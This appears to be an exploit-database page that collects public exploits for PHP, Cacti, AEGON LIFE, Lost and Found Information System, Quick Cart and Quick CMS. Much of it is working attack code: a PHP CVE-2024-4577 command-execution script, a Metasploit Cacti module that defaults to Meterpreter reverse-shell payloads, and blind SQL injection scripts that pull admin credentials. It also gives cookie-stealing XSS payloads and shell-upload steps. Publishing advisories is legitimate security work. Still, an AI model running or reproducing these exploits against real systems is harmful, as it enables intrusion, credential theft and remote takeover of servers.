AEGON LIFE version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Life Insurance Management System- SQL injection vulnerability.# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36597# Description:----------------Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.# Payload:------------------client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce-------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed# Burp Request-------------------GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1Host: localhostsec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close

AEGON LIFE 1.0 SQL Injection

PHP versions prior to 8.3.8 suffer from a remote code execution vulnerability.

    # Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www.php.net/downloads.php# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______   / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  | | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /  | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /   | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /     \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                                                                                                                                                                                                                                  Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py    ''')   def exploit(url, command):           payloads = {        '<?php echo "vulnerable"; ?>',        '<?php echo shell_exec("'+command+'"); ?>'     }        headers = {    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',    'Content-Type': 'application/x-www-form-urlencoded'}    s = Session()    for payload in payloads:        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"        req = Request('POST', url, data=payload, headers=headers)        prepped = req.prepare()        del prepped.headers['Content-Type']        resp = s.send(prepped,        verify=False,        timeout=15)        #print(prepped.headers)        #print(url)        #print(resp.headers)               #print(payload)        print(resp.status_code)        print(resp.text)if __name__ == '__main__':    title()    if(len(sys.argv) < 2):        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))                exit(0)    else:        exploit(sys.argv[1],sys.argv[2])

PHP Remote Code Execution

This exploit module leverages an arbitrary file write vulnerability in Cacti versions prior to 1.2.27 to achieve remote code execution. It abuses the Import Packages feature to upload a specially crafted package that embeds a PHP file. Cacti will extract this file to an accessible location. The module finally triggers the payload to execute arbitrary PHP code in the context of the user running the web server. Authentication is needed and the account must have access to the Import Packages feature. This is granted by setting the Import Templates permission in the Template Editor section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Cacti  include Msf::Payload::Php  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti Import Packages RCE',        'Description' => %q{          This exploit module leverages an arbitrary file write vulnerability          (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It          abuses the `Import Packages` feature to upload a specially crafted          package that embeds a PHP file. Cacti will extract this file to an          accessible location. The module finally triggers the payload to execute          arbitrary PHP code in the context of the user running the web server.          Authentication is needed and the account must have access to the          `Import Packages` feature. This is granted by setting the `Import          Templates` permission in the `Template Editor` section.        },        'License' => MSF_LICENSE,        'Author' => [          'Egidio Romano', # Initial research and discovery          'Christophe De La Fuente' # Metasploit module        ],        'References' => [          [ 'URL', 'https://karmainsecurity.com/KIS-2024-04'],          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88'],          [ 'CVE', '2024-25641']        ],        'Platform' => ['unix linux win'],        'Privileged' => false,        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [          [            'PHP',            {              'Arch' => ARCH_PHP,              'Platform' => 'php',              'Type' => :php,              'DefaultOptions' => {                # Payload is not set automatically when selecting this target.                # Select Meterpreter by default                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Command',            {              'Arch' => ARCH_CMD,              'Platform' => [ 'unix', 'linux' ],              'DefaultOptions' => {                # Payload is not set automatically when selecting this target.                # Select a x64 fetch payload by default.                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win',              'DefaultOptions' => {                # Payload is not set automatically when selecting this target.                # Select a x64 fetch payload by default.                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp'              }            }          ]        ],        'DisclosureDate' => '2024-05-12',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),        OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])      ]    )  end  def check    # Step 1 - Check if the target is Cacti and get the version    print_status('Checking Cacti version')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?    html = res.get_html_document    begin      cacti_version = parse_version(html)      version_msg = "The web server is running Cacti version #{cacti_version}"    rescue Msf::Exploit::Cacti::CactiNotFoundError => e      return CheckCode::Safe(e.message)    rescue Msf::Exploit::Cacti::CactiVersionNotFoundError => e      return CheckCode::Unknown(e.message)    end    if Rex::Version.new(cacti_version) < Rex::Version.new('1.2.27')      print_good(version_msg)    else      return CheckCode::Safe(version_msg)    end    # Step 2 - Login    @csrf_token = parse_csrf_token(html)    return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?    begin      do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)    rescue Msf::Exploit::Cacti::CactiError => e      return CheckCode::Unknown("Login failed: #{e}")    end    @logged_in = true    # Step 3 - Check if the user has enough permissions to reach `package_import.php`    print_status('Checking permissions to access `package_import.php`')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'package_import.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not access `package_import.php` - no response') if res.nil?    return CheckCode::Unknown("Could not access `package_import.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200    # The form with the CSRF token input field is not present when access is denied    if parse_csrf_token(res.get_html_document).empty?      return CheckCode::Safe('Could not access `package_import.php` - insufficient permissions')    end    CheckCode::Appears  end  # Taken from modules/payloads/singles/php/exec.rb  def php_exec(cmd)    dis = '$' + rand_text_alpha(4..7)    shell = <<-END_OF_PHP_CODE    #{php_preamble(disabled_varname: dis)}    $c = base64_decode("#{Rex::Text.encode_base64(cmd)}");    #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}    END_OF_PHP_CODE    Rex::Text.compress(shell)  end  def generate_package    @payload_path = "resource/#{rand_text_alphanumeric(5..10)}.php"    php_payload = target['Type'] == :php ? payload.encoded : php_exec(payload.encoded)    digest = OpenSSL::Digest.new('SHA256')    pkey = OpenSSL::PKey::RSA.new(2048)    file_signature = pkey.sign(digest, php_payload)    xml_data = <<~XML      <xml>         <files>            <file>               <name>#{@payload_path}</name>               <data>#{Rex::Text.encode_base64(php_payload)}</data>               <filesignature>#{Rex::Text.encode_base64(file_signature)}</filesignature>            </file>         </files>         <publickey>#{Rex::Text.encode_base64(pkey.public_key.to_pem)}</publickey>         <signature></signature>      </xml>    XML    signature = pkey.sign(digest, xml_data)    xml_data.sub!('<signature></signature>', "<signature>#{Rex::Text.encode_base64(signature)}</signature>")    Rex::Text.gzip(xml_data)  end  def upload_package    print_status('Uploading the package')    # Default parameters sent when importing packages from the web UI    # Randomizing these values might be suspicious    vars_form = {      '__csrf_magic' => @csrf_token,      'trust_signer' => 'on',      'data_source_profile' => '1',      'remove_orphans' => 'on',      'replace_svalues' => 'on',      'image_format' => '3',      'graph_height' => '200',      'graph_width' => '700',      'save_component_import' => '1',      'preview_only' => 'on',      'action' => 'save'    }    vars_form_data = []    vars_form.each do |name, data|      vars_form_data << { 'name' => name, 'data' => data }    end    vars_form_data << {      'name' => 'import_file',      'filename' => "#{rand_text_alphanumeric(5..10)}.xml.gz",      'content_type' => 'application/x-gzip',      'encoding' => 'binary',      'data' => generate_package    }    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'package_import.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_form_data' => vars_form_data    )    fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when sending the preview import request') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected response code (#{res.code}) when sending the preview import request") unless res.code == 200    html = res.get_html_document    local_path = html.xpath('//input[starts-with(@id, "chk_file")]/@title').text    fail_with(Failure::Unknown, 'Unable to import the package') if local_path.empty?    vars_form['preview_only'] = ''    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'package_import.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => vars_form    )    fail_with(Failure::Unreachable, 'Could not connect to the web server - no response when importing the package') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected response code when importing the package (#{res.code})") unless res.code == 302    local_path  end  def trigger_payload    # Expecting no response    print_status('Triggering the payload')    send_request_cgi({      'uri' => normalize_uri(target_uri.path, @payload_path),      'method' => 'GET'    }, 1)  end  def exploit    # Setting the `FETCH_DELETE` option seems to break the payload execution.    # `Msf::Exploit::FileDropper` will be used later to cleanup. Note that it    # is not possible to opt-out anymore.    fail_with(Failure::BadConfig, 'FETCH_DELETE must be set to false') if datastore['FETCH_DELETE']    unless @csrf_token      begin        @csrf_token = get_csrf_token      rescue CactiError => e        fail_with(Failure::NotFound, "Unable to get the CSRF token: #{e.class} - #{e}")      end    end    unless @logged_in      begin        do_login(datastore['USERNAME'], datastore['PASSWORD'], csrf_token: @csrf_token)      rescue CactiError => e        fail_with(Failure::NoAccess, "Login failure: #{e.class} - #{e}")      end    end    package_path = upload_package    register_file_for_cleanup(package_path)    # For fetch payloads, setting the `FETCH_DELETE` option seems to break the    # payload execution. Using `#register_file_for_cleanup` instead, since we    # know the local path.    if target['Type'] != :php && payload_instance.is_a?(Msf::Payload::Adapter::Fetch)      if File.absolute_path?(datastore['FETCH_FILENAME'])        register_file_for_cleanup(datastore['FETCH_FILENAME'])      else        register_file_for_cleanup(File.join(File.dirname(package_path), datastore['FETCH_FILENAME']))      end    end    trigger_payload  endend

Cacti Import Packages Remote Code Execution

Lost and Found Information System version 1.0 suffers from a reflective cross site scripting vulnerability.

    # Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users# CVE : CVE-2024-378591) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>

Lost And Found Information System 1.0 Cross Site Scripting

Lost and Found Information System version 1.0 suffers from an unauthenticated blind boolean-based remote SQL injection vulnerability.

    # Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.# CVE : CVE-2024-37857import requests,string,sys,argparser = requests.Session()proxies = {'http': 'http://127.0.0.1:8080'}admin_path = "/php-lfis/admin/index.php"createCategory_path = "/php-lfis/classes/Master.php"def char_extract(rhost, payload):    params = {"page": "categories/view_category", "id": payload}    response = r.get(rhost+admin_path, params=params)    if "Category ID is not valid" not in response.text:        return True    else:        return False    def sqli(rhost, column):    charset = string.printable    output_length = 200    output = ""    for i in range(output_length):        for char in charset:            # Extracts the credentials of user with id=1, admin by default            payload = "13371337' or char(%s) = (select substring(%s,%s,1) from users where id=1)-- -" % (ord(str(char)),str(column),str(i+1))            sys.stdout.write(f"\r[*] Extracting: {output}\r")            if char_extract(rhost, payload):                output += char                break            elif char == '~' and not char_extract(rhost, payload):                print("[*] Extracting:",output)                return outputdef argsetup():    about  = 'Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'    parser = argparse.ArgumentParser(description=about)    parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)    args = parser.parse_args()    return argsdef main():    args   = argsetup()    rhost = args.target    print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))if __name__ == "__main__":    main()

Lost And Found Information System 1.0 SQL Injection

Lost and Found Information System version 1.0 suffers from an unauthenticated blind time-based remote SQL injection vulnerability.

    # Exploit Title: Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.# CVE : CVE-2024-37858import requests,string,sys,argparser = requests.Session()proxies = {'http': 'http://127.0.0.1:8080'}admin_path = "/php-lfis/admin/index.php"createCategory_path = "/php-lfis/classes/Master.php"def char_extract(rhost, payload):    params = {"page": "categories/manage_category", "id": payload}    response = r.get(rhost+admin_path, params=params)    if response.elapsed.total_seconds() > 1:        return True    else:        return False    def sqli(rhost, column):    charset = string.printable    output_length = 200    output = ""    for i in range(output_length):        for char in charset:            # Extracts the credentials of user with id=1, admin by default            payload = "13371337' or if((char(%s)=(select substring(%s,%s,1) from users where id=1)),sleep(1),1)-- -" % (ord(str(char)),str(column),str(i+1))            sys.stdout.write(f"\r[*] Extracting: {output}\r")            if char_extract(rhost, payload):                output += char                break            elif char == '~' and not char_extract(rhost, payload):                print("[*] Extracting:",output)                return outputdef argsetup():    about  = 'Unauthenticated Blind Time-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'    parser = argparse.ArgumentParser(description=about)    parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)    args = parser.parse_args()    return argsdef main():    args   = argsetup()    rhost = args.target    print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))if __name__ == "__main__":    main()

Lost and Found Information System version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross Site Scripting Exploit - Lost and Found Information System # Exploit Author: Amit Roy (Rezur / AR0x7)# Date: June 07, 2024# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip# Tested on: Kali Linux, Apache, Mysql# Version: v1.0# Exploit Description:#   Lost and Found Information System v1.0 suffers from a Stored Cross Site Scripting Vulnerability allowing authenticated attackers to execute javascript in context of other users including the admin# CVE : CVE-2024-378561) Go to the User Profile page2) Paste the XSS payload '<script>alert(document.cookie)</script>' in either of the first, last, middle name fields3) The payload will be triggered in the context of the admin or the other users# Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System

Quick Cart version 6.7 suffers from a remote shell upload vulnerability provided you have administrative privileges.

    # Title : Authenticated Remote Code Execution & Shell Upload# Product : Quick Cart# Vendor : https://opensolution.org/# Affected Version : 6.7# Researcher : Eagle Eye# Tested on : Window & Linux# Date : 11/06/2024# Affected path : admin.php , core/common-admin.php, database/config.php# Affected function : saveVariables()# Report : Already contact the vendor but no response# Description : Unfiltered parameter that post into admin.php?p=tools-config override any$config key value cause to unwanted file inclusion and allowed file extension overridinglead to remote code execution.# Step to reproduce (Method 1)- login at admin.php- click Products and New Product from top navbar- On the right panel, choose add file- Upload malicious script with extension txt or any allowed extension like jpg- click setting on right above- click save and intercept the request- on body parameter, add &default_pages_template=../../files/yourmaliciousfile.txt and proceed# Step to reproduce (Method 2)- login at admin.php- click setting on right above- click save and intercept the request- on body parameter, add &allowed_extensions=php and proceed- click Products and New Product from top navbar- On the right panel, choose add file- And you can upload malicious script with extension php - You may find on path eg: http://website.com/files/shell.php

Quick Cart 6.7 Shell Upload

Quick CMS version 6.7 suffers from a remote shell upload vulnerability provided you have administrative privileges.

    # Title : Authenticated Shell Upload# Product : Quick CMS# Vendor : https://opensolution.org/# Affected Version : 6.7# Researcher : Eagle Eye# Tested on : Window & Linux# Date : 11/06/2024# Report : Already contact the vendor but no response# Affected path : admin.php , core/common-admin.php, database/config.php# Affected function : saveVariables()# Description : Unfiltered parameter that post into admin.php?p=settings override any$config key value cause to file upload allowed extension overridinglead to shell upload.# Step to reproduce- login at admin.php- click setting on right above- click save and intercept the request- on body parameter, add &allowed_not_image_extensions=php and proceed- click Pages and New page from top navbar- On the panel, choose Add files- And you can upload malicious script with extension php - You may find on path eg: http://website.com/files/shell.php

Quick CMS 6.7 Shell Upload

Cisco Talos is disclosing a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.”

Tag

#php